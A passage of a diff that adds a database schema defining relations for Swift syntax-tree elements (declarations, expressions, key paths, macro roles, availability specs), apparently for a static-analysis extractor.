+ unique int id: @comment, + string text: string ref +); + +db_files( + unique int id: @db_file +); + +db_locations( + unique int id: @db_location +); + +diagnostics( + unique int id: @diagnostics, + string text: string ref, + int kind: int ref +); + +@error_element = + @error_expr +| @error_type +| @overloaded_decl_ref_expr +| @unresolved_decl_ref_expr +| @unresolved_dot_expr +| @unresolved_member_chain_result_expr +| @unresolved_member_expr +| @unresolved_pattern_expr +| @unresolved_specialize_expr +| @unresolved_type +| @unresolved_type_conversion_expr +| @unspecified_element +; + +availability_infos( + unique int id: @availability_info +); + +#keyset[id] +availability_info_is_unavailable( + int id: @availability_info ref +); + +#keyset[id, index] +availability_info_specs( + int id: @availability_info ref, + int index: int ref, + int spec: @availability_spec_or_none ref +); + +@availability_spec = + @other_availability_spec +| @platform_version_availability_spec +; + +@callable = + @closure_expr +| @function +; + +#keyset[id] +callable_names( + int id: @callable ref, + string name: string ref +); + +#keyset[id] +callable_self_params( + int id: @callable ref, + int self_param: @param_decl_or_none ref +); + +#keyset[id, index] +callable_params( + int id: @callable ref, + int index: int ref, + int param: @param_decl_or_none ref +); + +#keyset[id] +callable_bodies( + int id: @callable ref, + int body: @brace_stmt_or_none ref +); + +#keyset[id, index] +callable_captures( + int id: @callable ref, + int index: int ref, + int capture: @captured_decl_or_none ref +); + +key_path_components( + unique int id: @key_path_component, + int kind: int ref, + int component_type: @type_or_none ref +); + +#keyset[id, index] +key_path_component_subscript_arguments( + int id: @key_path_component ref, + int index: int ref, + int subscript_argument: @argument_or_none ref +); + +#keyset[id] +key_path_component_tuple_indices( + int id: @key_path_component ref, + int tuple_index: int ref +); + +#keyset[id] +key_path_component_decl_refs( + int id: @key_path_component ref, + int decl_ref: @value_decl_or_none ref +); + +macro_roles( + unique int id: @macro_role, + int kind: int ref, + int macro_syntax: int ref +); + +#keyset[id, index] +macro_role_conformances( + int id: @macro_role ref, + int index: int ref, + int conformance: @type_expr_or_none ref +); + +#keyset[id, index] +macro_role_names( + int id: @macro_role ref, + int index: int ref, + string name: string ref +); + +unspecified_elements( + unique int id: @unspecified_element, + string property: string ref, + string error: string ref +); + +#keyset[id] +unspecified_element_parents( + int id: @unspecified_element ref, + int parent: @element ref +); + +#keyset[id] +unspecified_element_indices( + int id: @unspecified_element ref, + int index: int ref +); + +#keyset[id, index] +unspecified_element_children( + int id: @unspecified_element ref, + int index: int ref, + int child: @ast_node_or_none ref +); + +other_availability_specs( + unique int id: @other_availability_spec +); + +platform_version_availability_specs( + unique int id: @platform_version_availability_spec, + string platform: string ref, + string version: string ref +); + +@decl = + @captured_decl +| @enum_case_decl +| @extension_decl +| @if_config_decl +| @import_decl +| @missing_member_decl +| @operator_decl +| @pattern_binding_decl +| @pound_diagnostic_decl +| @precedence_group_decl +| @top_level_code_decl +| @value_decl +; + +#keyset[id] +decls( //dir=decl + int id: @decl ref, + int module: @module_decl_or_none ref +); + +#keyset[id, index] +decl_members( //dir=decl + int id: @decl ref, + int index: int ref, + int member: @decl_or_none ref +); + +@generic_context = + @extension_decl +| @function +| @generic_type_decl +| @macro_decl +| @subscript_decl +; + +#keyset[id, index] +generic_context_generic_type_params( //dir=decl + int id: @generic_context ref, + int index: int ref, + int generic_type_param: @generic_type_param_decl_or_none ref +); + +captured_decls( //dir=decl + unique int id: @captured_decl, + int decl: @value_decl_or_none ref +); + +#keyset[id] +captured_decl_is_direct( //dir=decl + int id: @captured_decl ref +); + +#keyset[id] +captured_decl_is_escaping( //dir=decl + int id: @captured_decl ref +); + +enum_case_decls( //dir=decl + unique int id: @enum_case_decl +); + +#keyset[id, index] +enum_case_decl_elements( //dir=decl + int id: @enum_case_decl ref, + int index: int ref, + int element: @enum_element_decl_or_none ref +); + +extension_decls( //dir=decl + unique int id: @extension_decl, + int extended_type_decl: @nominal_type_decl_or_none ref +); + +#keyset[id, index] +extension_decl_protocols( //dir=decl + int id: @extension_decl ref, + int index: int ref, + int protocol: @protocol_decl_or_none ref +); + +if_config_decls( //dir=decl + unique int id: @if_config_decl +); + +#keyset[id, index] +if_config_decl_active_elements( //dir=decl + int id: @if_config_decl ref, + int index: int ref, + int active_element: @ast_node_or_none ref +); + +import_decls( //dir=decl + unique int id: @import_decl +); + +#keyset[id] +import_decl_is_exported( //dir=decl + int id: @import_decl ref +); + +#keyset[id] +import_decl_imported_modules( //dir=decl + int id: @import_decl ref, + int imported_module: @module_decl_or_none ref +); + +#keyset[id, index] +import_decl_declarations( //dir=decl + int id: @import_decl ref, + int index: int ref, + int declaration: @value_decl_or_none ref +); + +missing_member_decls( //dir=decl + unique int id: @missing_member_decl, + string name: string ref +); + +@operator_decl = + @infix_operator_decl +| @postfix_operator_decl +| @prefix_operator_decl +; + +#keyset[id] +operator_decls( //dir=decl + int id: @operator_decl ref, + string name: string ref +); + +pattern_binding_decls( //dir=decl + unique int id: @pattern_binding_decl +); + +#keyset[id, index] +pattern_binding_decl_inits( //dir=decl + int id: @pattern_binding_decl ref, + int index: int ref, + int init: @expr_or_none ref +); + +#keyset[id, index] +pattern_binding_decl_patterns( //dir=decl + int id: @pattern_binding_decl ref, + int index: int ref, + int pattern: @pattern_or_none ref +); + +pound_diagnostic_decls( //dir=decl + unique int id: @pound_diagnostic_decl, + int kind: int ref, + int message: @string_literal_expr_or_none ref +); + +precedence_group_decls( //dir=decl + unique int id: @precedence_group_decl +); + +top_level_code_decls( //dir=decl + unique int id: @top_level_code_decl, + int body: @brace_stmt_or_none ref +); + +@value_decl = + @abstract_storage_decl +| @enum_element_decl +| @function +| @macro_decl +| @type_decl +; + +#keyset[id] +value_decls( //dir=decl + int id: @value_decl ref, + int interface_type: @type_or_none ref +); + +@abstract_storage_decl = + @subscript_decl +| @var_decl +; + +#keyset[id, index] +abstract_storage_decl_accessors( //dir=decl + int id: @abstract_storage_decl ref, + int index: int ref, + int accessor: @accessor_or_none ref +); + +enum_element_decls( //dir=decl + unique int id: @enum_element_decl, + string name: string ref +); + +#keyset[id, index] +enum_element_decl_params( //dir=decl + int id: @enum_element_decl ref, + int index: int ref, + int param: @param_decl_or_none ref +); + +@function = + @accessor_or_named_function +| @deinitializer +| @initializer +; + +infix_operator_decls( //dir=decl + unique int id: @infix_operator_decl +); + +#keyset[id] +infix_operator_decl_precedence_groups( //dir=decl + int id: @infix_operator_decl ref, + int precedence_group: @precedence_group_decl_or_none ref +); + +macro_decls( //dir=decl + unique int id: @macro_decl, + string name: string ref +); + +#keyset[id, index] +macro_decl_parameters( //dir=decl + int id: @macro_decl ref, + int index: int ref, + int parameter: @param_decl_or_none ref +); + +#keyset[id, index] +macro_decl_roles( //dir=decl + int id: @macro_decl ref, + int index: int ref, + int role: @macro_role_or_none ref +); + +postfix_operator_decls( //dir=decl + unique int id: @postfix_operator_decl +); + +prefix_operator_decls( //dir=decl + unique int id: @prefix_operator_decl +); + +@type_decl = + @abstract_type_param_decl +| @generic_type_decl +| @module_decl +; + +#keyset[id] +type_decls( //dir=decl + int id: @type_decl ref, + string name: string ref +); + +#keyset[id, index] +type_decl_inherited_types( //dir=decl + int id: @type_decl ref, + int index: int ref, + int inherited_type: @type_or_none ref +); + +@abstract_type_param_decl = + @associated_type_decl +| @generic_type_param_decl +; + +@accessor_or_named_function = + @accessor +| @named_function +; + +deinitializers( //dir=decl + unique int id: @deinitializer +); + +@generic_type_decl = + @nominal_type_decl +| @opaque_type_decl +| @type_alias_decl +; + +initializers( //dir=decl + unique int id: @initializer +); + +module_decls( //dir=decl + unique int id: @module_decl +); + +#keyset[id] +module_decl_is_builtin_module( //dir=decl + int id: @module_decl ref +); + +#keyset[id] +module_decl_is_system_module( //dir=decl + int id: @module_decl ref +); + +module_decl_imported_modules( //dir=decl + int id: @module_decl ref, + int imported_module: @module_decl_or_none ref +); + +module_decl_exported_modules( //dir=decl + int id: @module_decl ref, + int exported_module: @module_decl_or_none ref +); + +subscript_decls( //dir=decl + unique int id: @subscript_decl, + int element_type: @type_or_none ref +); + +#keyset[id, index] +subscript_decl_params( //dir=decl + int id: @subscript_decl ref, + int index: int ref, + int param: @param_decl_or_none ref +); + +@var_decl = + @concrete_var_decl +| @param_decl +; + +#keyset[id] +var_decls( //dir=decl + int id: @var_decl ref, + string name: string ref, + int type_: @type_or_none ref +); + +#keyset[id] +var_decl_attached_property_wrapper_types( //dir=decl + int id: @var_decl ref, + int attached_property_wrapper_type: @type_or_none ref +); + +#keyset[id] +var_decl_parent_patterns( //dir=decl + int id: @var_decl ref, + int parent_pattern: @pattern_or_none ref +); + +#keyset[id] +var_decl_parent_initializers( //dir=decl + int id: @var_decl ref, + int parent_initializer: @expr_or_none ref +); + +#keyset[id] +var_decl_property_wrapper_backing_var_bindings( //dir=decl + int id: @var_decl ref, + int property_wrapper_backing_var_binding: @pattern_binding_decl_or_none ref +); + +#keyset[id] +var_decl_property_wrapper_backing_vars( //dir=decl + int id: @var_decl ref, + int property_wrapper_backing_var: @var_decl_or_none ref +); + +#keyset[id] +var_decl_property_wrapper_projection_var_bindings( //dir=decl + int id: @var_decl ref, + int property_wrapper_projection_var_binding: @pattern_binding_decl_or_none ref +); + +#keyset[id] +var_decl_property_wrapper_projection_vars( //dir=decl + int id: @var_decl ref, + int property_wrapper_projection_var: @var_decl_or_none ref +); + +accessors( //dir=decl + unique int id: @accessor +); + +#keyset[id] +accessor_is_getter( //dir=decl + int id: @accessor ref +); + +#keyset[id] +accessor_is_setter( //dir=decl + int id: @accessor ref +); + +#keyset[id] +accessor_is_will_set( //dir=decl + int id: @accessor ref +); + +#keyset[id] +accessor_is_did_set( //dir=decl + int id: @accessor ref +); + +#keyset[id] +accessor_is_read( //dir=decl + int id: @accessor ref +); + +#keyset[id] +accessor_is_modify( //dir=decl + int id: @accessor ref +); + +#keyset[id] +accessor_is_unsafe_address( //dir=decl + int id: @accessor ref +); + +#keyset[id] +accessor_is_unsafe_mutable_address( //dir=decl + int id: @accessor ref +); + +associated_type_decls( //dir=decl + unique int id: @associated_type_decl +); + +concrete_var_decls( //dir=decl + unique int id: @concrete_var_decl, + int introducer_int: int ref +); + +generic_type_param_decls( //dir=decl + unique int id: @generic_type_param_decl +); + +named_functions( //dir=decl + unique int id: @named_function +); + +@nominal_type_decl = + @class_decl +| @enum_decl +| @protocol_decl +| @struct_decl +; + +#keyset[id] +nominal_type_decls( //dir=decl + int id: @nominal_type_decl ref, + int type_: @type_or_none ref +); + +opaque_type_decls( //dir=decl + unique int id: @opaque_type_decl, + int naming_declaration: @value_decl_or_none ref +); + +#keyset[id, index] +opaque_type_decl_opaque_generic_params( //dir=decl + int id: @opaque_type_decl ref, + int index: int ref, + int opaque_generic_param: @generic_type_param_type_or_none ref +); + +param_decls( //dir=decl + unique int id: @param_decl +); + +#keyset[id] +param_decl_is_inout( //dir=decl + int id: @param_decl ref +); + +#keyset[id] +param_decl_property_wrapper_local_wrapped_var_bindings( //dir=decl + int id: @param_decl ref, + int property_wrapper_local_wrapped_var_binding: @pattern_binding_decl_or_none ref +); + +#keyset[id] +param_decl_property_wrapper_local_wrapped_vars( //dir=decl + int id: @param_decl ref, + int property_wrapper_local_wrapped_var: @var_decl_or_none ref +); + +type_alias_decls( //dir=decl + unique int id: @type_alias_decl, + int aliased_type: @type_or_none ref +); + +class_decls( //dir=decl + unique int id: @class_decl +); + +enum_decls( //dir=decl + unique int id: @enum_decl +); + +protocol_decls( //dir=decl + unique int id: @protocol_decl +); + +struct_decls( //dir=decl + unique int id: @struct_decl +); + +arguments( //dir=expr + unique int id: @argument, + string label: string ref, + int expr: @expr_or_none ref +); + +@expr = + @any_try_expr +| @applied_property_wrapper_expr +| @apply_expr +| @assign_expr +| @bind_optional_expr +| @capture_list_expr +| @closure_expr +| @collection_expr +| @consume_expr +| @copy_expr +| @decl_ref_expr +| @default_argument_expr +| @discard_assignment_expr +| @dot_syntax_base_ignored_expr +| @dynamic_type_expr +| @enum_is_case_expr +| @error_expr +| @explicit_cast_expr +| @force_value_expr +| @identity_expr +| @if_expr +| @implicit_conversion_expr +| @in_out_expr +| @key_path_application_expr +| @key_path_dot_expr +| @key_path_expr +| @lazy_initialization_expr +| @literal_expr +| @lookup_expr +| @make_temporarily_escapable_expr +| @materialize_pack_expr +| @obj_c_selector_expr +| @one_way_expr +| @opaque_value_expr +| @open_existential_expr +| @optional_evaluation_expr +| @other_initializer_ref_expr +| @overloaded_decl_ref_expr +| @pack_element_expr +| @pack_expansion_expr +| @property_wrapper_value_placeholder_expr +| @rebind_self_in_initializer_expr +| @sequence_expr +| @single_value_stmt_expr +| @super_ref_expr +| @tap_expr +| @tuple_element_expr +| @tuple_expr +| @type_expr +| @unresolved_decl_ref_expr +| @unresolved_dot_expr +| @unresolved_member_expr +| @unresolved_pattern_expr +| @unresolved_specialize_expr +| @vararg_expansion_expr +; + +#keyset[id] +expr_types( //dir=expr + int id: @expr ref, + int type_: @type_or_none ref +); + +@any_try_expr = + @force_try_expr +| @optional_try_expr +| @try_expr +; + +#keyset[id] +any_try_exprs( //dir=expr + int id: @any_try_expr ref, + int sub_expr: @expr_or_none ref +); + +applied_property_wrapper_exprs( //dir=expr + unique int id: @applied_property_wrapper_expr, + int kind: int ref, + int value: @expr_or_none ref, + int param: @param_decl_or_none ref +); + +@apply_expr = + @binary_expr +| @call_expr +| @postfix_unary_expr +| @prefix_unary_expr +| @self_apply_expr +; + +#keyset[id] +apply_exprs( //dir=expr + int id: @apply_expr ref, + int function: @expr_or_none ref +); + +#keyset[id, index] +apply_expr_arguments( //dir=expr + int id: @apply_expr ref, + int index: int ref, + int argument: @argument_or_none ref +); + +assign_exprs( //dir=expr + unique int id: @assign_expr, + int dest: @expr_or_none ref, + int source: @expr_or_none ref +); + +bind_optional_exprs( //dir=expr + unique int id: @bind_optional_expr, + int sub_expr: @expr_or_none ref +); + +capture_list_exprs( //dir=expr + unique int id: @capture_list_expr, + int closure_body: @closure_expr_or_none ref +); + +#keyset[id, index] +capture_list_expr_binding_decls( //dir=expr + int id: @capture_list_expr ref, + int index: int ref, + int binding_decl: @pattern_binding_decl_or_none ref +); + +@closure_expr = + @auto_closure_expr +| @explicit_closure_expr +; + +@collection_expr = + @array_expr +| @dictionary_expr +; + +consume_exprs( //dir=expr + unique int id: @consume_expr, + int sub_expr: @expr_or_none ref +); + +copy_exprs( //dir=expr + unique int id: @copy_expr, + int sub_expr: @expr_or_none ref +); + +decl_ref_exprs( //dir=expr + unique int id: @decl_ref_expr, + int decl: @decl_or_none ref +); + +#keyset[id, index] +decl_ref_expr_replacement_types( //dir=expr + int id: @decl_ref_expr ref, + int index: int ref, + int replacement_type: @type_or_none ref +); + +#keyset[id] +decl_ref_expr_has_direct_to_storage_semantics( //dir=expr + int id: @decl_ref_expr ref +); + +#keyset[id] +decl_ref_expr_has_direct_to_implementation_semantics( //dir=expr + int id: @decl_ref_expr ref +); + +#keyset[id] +decl_ref_expr_has_ordinary_semantics( //dir=expr + int id: @decl_ref_expr ref +); + +#keyset[id] +decl_ref_expr_has_distributed_thunk_semantics( //dir=expr + int id: @decl_ref_expr ref +); + +default_argument_exprs( //dir=expr + unique int id: @default_argument_expr, + int param_decl: @param_decl_or_none ref, + int param_index: int ref +); + +#keyset[id] +default_argument_expr_caller_side_defaults( //dir=expr + int id: @default_argument_expr ref, + int caller_side_default: @expr_or_none ref +); + +discard_assignment_exprs( //dir=expr + unique int id: @discard_assignment_expr +); + +dot_syntax_base_ignored_exprs( //dir=expr + unique int id: @dot_syntax_base_ignored_expr, + int qualifier: @expr_or_none ref, + int sub_expr: @expr_or_none ref +); + +dynamic_type_exprs( //dir=expr + unique int id: @dynamic_type_expr, + int base: @expr_or_none ref +); + +enum_is_case_exprs( //dir=expr + unique int id: @enum_is_case_expr, + int sub_expr: @expr_or_none ref, + int element: @enum_element_decl_or_none ref +); + +error_exprs( //dir=expr + unique int id: @error_expr +); + +@explicit_cast_expr = + @checked_cast_expr +| @coerce_expr +; + +#keyset[id] +explicit_cast_exprs( //dir=expr + int id: @explicit_cast_expr ref, + int sub_expr: @expr_or_none ref +); + +force_value_exprs( //dir=expr + unique int id: @force_value_expr, + int sub_expr: @expr_or_none ref +); + +@identity_expr = + @await_expr +| @borrow_expr +| @dot_self_expr +| @paren_expr +| @unresolved_member_chain_result_expr +; + +#keyset[id] +identity_exprs( //dir=expr + int id: @identity_expr ref, + int sub_expr: @expr_or_none ref +); + +if_exprs( //dir=expr + unique int id: @if_expr, + int condition: @expr_or_none ref, + int then_expr: @expr_or_none ref, + int else_expr: @expr_or_none ref +); + +@implicit_conversion_expr = + @abi_safe_conversion_expr +| @any_hashable_erasure_expr +| @archetype_to_super_expr +| @array_to_pointer_expr +| @bridge_from_obj_c_expr +| @bridge_to_obj_c_expr +| @class_metatype_to_object_expr +| @collection_upcast_conversion_expr +| @conditional_bridge_from_obj_c_expr +| @covariant_function_conversion_expr +| @covariant_return_conversion_expr +| @derived_to_base_expr +| @destructure_tuple_expr +| @differentiable_function_expr +| @differentiable_function_extract_original_expr +| @erasure_expr +| @existential_metatype_to_object_expr +| @foreign_object_conversion_expr +| @function_conversion_expr +| @in_out_to_pointer_expr +| @inject_into_optional_expr +| @linear_function_expr +| @linear_function_extract_original_expr +| @linear_to_differentiable_function_expr +| @load_expr +| @metatype_conversion_expr +| @pointer_to_pointer_expr +| @protocol_metatype_to_object_expr +| @string_to_pointer_expr +| @underlying_to_opaque_expr +| @unevaluated_instance_expr +| @unresolved_type_conversion_expr +; + +#keyset[id] +implicit_conversion_exprs( //dir=expr + int id: @implicit_conversion_expr ref, + int sub_expr: @expr_or_none ref +); + +in_out_exprs( //dir=expr + unique int id: @in_out_expr, + int sub_expr: @expr_or_none ref +); + +key_path_application_exprs( //dir=expr + unique int id: @key_path_application_expr, + int base: @expr_or_none ref, + int key_path: @expr_or_none ref +); + +key_path_dot_exprs( //dir=expr + unique int id: @key_path_dot_expr +); + +key_path_exprs( //dir=expr + unique int id: @key_path_expr +); + +#keyset[id] +key_path_expr_roots( //dir=expr + int id: @key_path_expr ref, + int root: @type_repr_or_none ref +); + +#keyset[id, index] +key_path_expr_components( //dir=expr + int id: @key_path_expr ref, + int index: int ref, + int component: @key_path_component_or_none ref +); + +lazy_initialization_exprs( //dir=expr + unique int id: @lazy_initialization_expr, + int sub_expr: @expr_or_none ref +); + +@literal_expr = + @builtin_literal_expr +| @interpolated_string_literal_expr +| @nil_literal_expr +| @object_literal_expr +| @regex_literal_expr +; + +@lookup_expr = + @dynamic_lookup_expr +| @member_ref_expr +| @subscript_expr +; + +#keyset[id] +lookup_exprs( //dir=expr + int id: @lookup_expr ref, + int base: @expr_or_none ref +); + +#keyset[id] +lookup_expr_members( //dir=expr + int id: @lookup_expr ref, + int member: @decl_or_none ref +); + +make_temporarily_escapable_exprs( //dir=expr + unique int id: @make_temporarily_escapable_expr, + int escaping_closure: @opaque_value_expr_or_none ref, + int nonescaping_closure: @expr_or_none ref, + int sub_expr: @expr_or_none ref +); + +materialize_pack_exprs( //dir=expr + unique int id: @materialize_pack_expr, + int sub_expr: @expr_or_none ref +); + +obj_c_selector_exprs( //dir=expr + unique int id: @obj_c_selector_expr, + int sub_expr: @expr_or_none ref, + int method: @function_or_none ref +); + +one_way_exprs( //dir=expr + unique int id: @one_way_expr, + int sub_expr: @expr_or_none ref +); + +opaque_value_exprs( //dir=expr + unique int id: @opaque_value_expr +); + +open_existential_exprs( //dir=expr + unique int id: @open_existential_expr, + int sub_expr: @expr_or_none ref, + int existential: @expr_or_none ref, + int opaque_expr: @opaque_value_expr_or_none ref +); + +optional_evaluation_exprs( //dir=expr + unique int id: @optional_evaluation_expr, + int sub_expr: @expr_or_none ref +); + +other_initializer_ref_exprs( //dir=expr + unique int id: @other_initializer_ref_expr, + int initializer: @initializer_or_none ref +); + +overloaded_decl_ref_exprs( //dir=expr + unique int id: @overloaded_decl_ref_expr +); + +#keyset[id, index] +overloaded_decl_ref_expr_possible_declarations( //dir=expr + int id: @overloaded_decl_ref_expr ref, + int index: int ref, + int possible_declaration: @value_decl_or_none ref +); + +pack_element_exprs( //dir=expr + unique int id: @pack_element_expr, + int sub_expr: @expr_or_none ref +); + +pack_expansion_exprs( //dir=expr + unique int id: @pack_expansion_expr, + int pattern_expr: @expr_or_none ref +); + +property_wrapper_value_placeholder_exprs( //dir=expr + unique int id: @property_wrapper_value_placeholder_expr, + int placeholder: @opaque_value_expr_or_none ref +); + +#keyset[id] +property_wrapper_value_placeholder_expr_wrapped_values( //dir=expr + int id: @property_wrapper_value_placeholder_expr ref, + int wrapped_value: @expr_or_none ref +); + +rebind_self_in_initializer_exprs( //dir=expr + unique int id: @rebind_self_in_initializer_expr, + int sub_expr: @expr_or_none ref, + int self: @var_decl_or_none ref +); + +sequence_exprs( //dir=expr + unique int id: @sequence_expr +); + +#keyset[id, index] +sequence_expr_elements( //dir=expr + int id: @sequence_expr ref, + int index: int ref, + int element: @expr_or_none ref +); + +single_value_stmt_exprs( //dir=expr + unique int id: @single_value_stmt_expr, + int stmt: @stmt_or_none ref +); + +super_ref_exprs( //dir=expr + unique int id: @super_ref_expr, + int self: @var_decl_or_none ref +); + +tap_exprs( //dir=expr + unique int id: @tap_expr, + int body: @brace_stmt_or_none ref, + int var: @var_decl_or_none ref +); + +#keyset[id] +tap_expr_sub_exprs( //dir=expr + int id: @tap_expr ref, + int sub_expr: @expr_or_none ref +); + +tuple_element_exprs( //dir=expr + unique int id: @tuple_element_expr, + int sub_expr: @expr_or_none ref, + int index: int ref +); + +tuple_exprs( //dir=expr + unique int id: @tuple_expr +); + +#keyset[id, index] +tuple_expr_elements( //dir=expr + int id: @tuple_expr ref, + int index: int ref, + int element: @expr_or_none ref +); + +type_exprs( //dir=expr + unique int id: @type_expr +); + +#keyset[id] +type_expr_type_reprs( //dir=expr + int id: @type_expr ref, + int type_repr: @type_repr_or_none ref +); + +unresolved_decl_ref_exprs( //dir=expr + unique int id: @unresolved_decl_ref_expr +); + +#keyset[id] +unresolved_decl_ref_expr_names( //dir=expr + int id: @unresolved_decl_ref_expr ref, + string name: string ref +); + +unresolved_dot_exprs( //dir=expr + unique int id: @unresolved_dot_expr, + int base: @expr_or_none ref, + string name: string ref +); + +unresolved_member_exprs( //dir=expr + unique int id: @unresolved_member_expr, + string name: string ref +); + +unresolved_pattern_exprs( //dir=expr + unique int id: @unresolved_pattern_expr, + int sub_pattern: @pattern_or_none ref +); + +unresolved_specialize_exprs( //dir=expr + unique int id: @unresolved_specialize_expr, + int sub_expr: @expr_or_none ref +); + +vararg_expansion_exprs( //dir=expr + unique int id: @vararg_expansion_expr, + int sub_expr: @expr_or_none ref +); + +abi_safe_conversion_exprs( //dir=expr + unique int id: @abi_safe_conversion_expr +); + +any_hashable_erasure_exprs( //dir=expr + unique int id: @any_hashable_erasure_expr +); + +archetype_to_super_exprs( //dir=expr + unique int id: @archetype_to_super_expr +); + +array_exprs( //dir=expr + unique int id: @array_expr +); + +#keyset[id, index] +array_expr_elements( //dir=expr + int id: @array_expr ref, + int index: int ref, + int element: @expr_or_none ref +); + +array_to_pointer_exprs( //dir=expr + unique int id: @array_to_pointer_expr +); + +auto_closure_exprs( //dir=expr + unique int id: @auto_closure_expr +); + +await_exprs( //dir=expr + unique int id: @await_expr +); + +binary_exprs( //dir=expr + unique int id: @binary_expr +); + +borrow_exprs( //dir=expr + unique int id: @borrow_expr +); + +bridge_from_obj_c_exprs( //dir=expr + unique int id: @bridge_from_obj_c_expr +); + +bridge_to_obj_c_exprs( //dir=expr + unique int id: @bridge_to_obj_c_expr +); + +@builtin_literal_expr = + @boolean_literal_expr +| @magic_identifier_literal_expr +| @number_literal_expr +| @string_literal_expr +; + +call_exprs( //dir=expr + unique int id: @call_expr +); + +@checked_cast_expr = + @conditional_checked_cast_expr +| @forced_checked_cast_expr +| @is_expr +; + +class_metatype_to_object_exprs( //dir=expr + unique int id: @class_metatype_to_object_expr +); + +coerce_exprs( //dir=expr + unique int id: @coerce_expr +); + +collection_upcast_conversion_exprs( //dir=expr + unique int id: @collection_upcast_conversion_expr +); + +conditional_bridge_from_obj_c_exprs( //dir=expr + unique int id: @conditional_bridge_from_obj_c_expr +); + +covariant_function_conversion_exprs( //dir=expr + unique int id: @covariant_function_conversion_expr +); + +covariant_return_conversion_exprs( //dir=expr + unique int id: @covariant_return_conversion_expr +); + +derived_to_base_exprs( //dir=expr + unique int id: @derived_to_base_expr +); + +destructure_tuple_exprs( //dir=expr + unique int id: @destructure_tuple_expr +); + +dictionary_exprs( //dir=expr + unique int id: @dictionary_expr +); + +#keyset[id, index] +dictionary_expr_elements( //dir=expr + int id: @dictionary_expr ref, + int index: int ref, + int element: @expr_or_none ref +); + +differentiable_function_exprs( //dir=expr + unique int id: @differentiable_function_expr +); + +differentiable_function_extract_original_exprs( //dir=expr + unique int id: @differentiable_function_extract_original_expr +); + +dot_self_exprs( //dir=expr + unique int id: @dot_self_expr +); + +@dynamic_lookup_expr = + @dynamic_member_ref_expr +| @dynamic_subscript_expr +; + +erasure_exprs( //dir=expr + unique int id: @erasure_expr +); + +existential_metatype_to_object_exprs( //dir=expr + unique int id: @existential_metatype_to_object_expr +); + +explicit_closure_exprs( //dir=expr + unique int id: @explicit_closure_expr +); + +force_try_exprs( //dir=expr + unique int id: @force_try_expr +); + +foreign_object_conversion_exprs( //dir=expr + unique int id: @foreign_object_conversion_expr +); + +function_conversion_exprs( //dir=expr + unique int id: @function_conversion_expr +); + +in_out_to_pointer_exprs( //dir=expr + unique int id: @in_out_to_pointer_expr +); + +inject_into_optional_exprs( //dir=expr + unique int id: @inject_into_optional_expr +); + +interpolated_string_literal_exprs( //dir=expr + unique int id: @interpolated_string_literal_expr +); + +#keyset[id] +interpolated_string_literal_expr_interpolation_exprs( //dir=expr + int id: @interpolated_string_literal_expr ref, + int interpolation_expr: @opaque_value_expr_or_none ref +); + +#keyset[id] +interpolated_string_literal_expr_appending_exprs( //dir=expr + int id: @interpolated_string_literal_expr ref, + int appending_expr: @tap_expr_or_none ref +); + +linear_function_exprs( //dir=expr + unique int id: @linear_function_expr +); + +linear_function_extract_original_exprs( //dir=expr + unique int id: @linear_function_extract_original_expr +); + +linear_to_differentiable_function_exprs( //dir=expr + unique int id: @linear_to_differentiable_function_expr +); + +load_exprs( //dir=expr + unique int id: @load_expr +); + +member_ref_exprs( //dir=expr + unique int id: @member_ref_expr +); + +#keyset[id] +member_ref_expr_has_direct_to_storage_semantics( //dir=expr + int id: @member_ref_expr ref +); + +#keyset[id] +member_ref_expr_has_direct_to_implementation_semantics( //dir=expr + int id: @member_ref_expr ref +); + +#keyset[id] +member_ref_expr_has_ordinary_semantics( //dir=expr + int id: @member_ref_expr ref +); + +#keyset[id] +member_ref_expr_has_distributed_thunk_semantics( //dir=expr + int id: @member_ref_expr ref +); + +metatype_conversion_exprs( //dir=expr + unique int id: @metatype_conversion_expr +); + +nil_literal_exprs( //dir=expr + unique int id: @nil_literal_expr +); + +object_literal_exprs( //dir=expr + unique int id: @object_literal_expr, + int kind: int ref +); + +#keyset[id, index] +object_literal_expr_arguments( //dir=expr + int id: @object_literal_expr ref, + int index: int ref, + int argument: @argument_or_none ref +); + +optional_try_exprs( //dir=expr + unique int id: @optional_try_expr +); + +paren_exprs( //dir=expr + unique int id: @paren_expr +); + +pointer_to_pointer_exprs( //dir=expr + unique int id: @pointer_to_pointer_expr +); + +postfix_unary_exprs( //dir=expr + unique int id: @postfix_unary_expr +); + +prefix_unary_exprs( //dir=expr + unique int id: @prefix_unary_expr +); + +protocol_metatype_to_object_exprs( //dir=expr + unique int id: @protocol_metatype_to_object_expr +); + +regex_literal_exprs( //dir=expr + unique int id: @regex_literal_expr, + string pattern: string ref, + int version: int ref +); + +@self_apply_expr = + @dot_syntax_call_expr +| @initializer_ref_call_expr +; + +#keyset[id] +self_apply_exprs( //dir=expr + int id: @self_apply_expr ref, + int base: @expr_or_none ref +); + +string_to_pointer_exprs( //dir=expr + unique int id: @string_to_pointer_expr +); + +subscript_exprs( //dir=expr + unique int id: @subscript_expr +); + +#keyset[id, index] +subscript_expr_arguments( //dir=expr + int id: @subscript_expr ref, + int index: int ref, + int argument: @argument_or_none ref +); + +#keyset[id] +subscript_expr_has_direct_to_storage_semantics( //dir=expr + int id: @subscript_expr ref +); + +#keyset[id] +subscript_expr_has_direct_to_implementation_semantics( //dir=expr + int id: @subscript_expr ref +); + +#keyset[id] +subscript_expr_has_ordinary_semantics( //dir=expr + int id: @subscript_expr ref +); + +#keyset[id] +subscript_expr_has_distributed_thunk_semantics( //dir=expr + int id: @subscript_expr ref +); + +try_exprs( //dir=expr + unique int id: @try_expr +); + +underlying_to_opaque_exprs( //dir=expr + unique int id: @underlying_to_opaque_expr +); + +unevaluated_instance_exprs( //dir=expr + unique int id: @unevaluated_instance_expr +); + +unresolved_member_chain_result_exprs( //dir=expr + unique int id: @unresolved_member_chain_result_expr +); + +unresolved_type_conversion_exprs( //dir=expr + unique int id: @unresolved_type_conversion_expr +); + +boolean_literal_exprs( //dir=expr + unique int id: @boolean_literal_expr, + boolean value: boolean ref +); + +conditional_checked_cast_exprs( //dir=expr + unique int id: @conditional_checked_cast_expr +); + +dot_syntax_call_exprs( //dir=expr + unique int id: @dot_syntax_call_expr +); + +dynamic_member_ref_exprs( //dir=expr + unique int id: @dynamic_member_ref_expr +); + +dynamic_subscript_exprs( //dir=expr + unique int id: @dynamic_subscript_expr +); + +forced_checked_cast_exprs( //dir=expr + unique int id: @forced_checked_cast_expr +); + +initializer_ref_call_exprs( //dir=expr + unique int id: @initializer_ref_call_expr +); + +is_exprs( //dir=expr + unique int id: @is_expr +); + +magic_identifier_literal_exprs( //dir=expr + unique int id: @magic_identifier_literal_expr, + string kind: string ref +); + 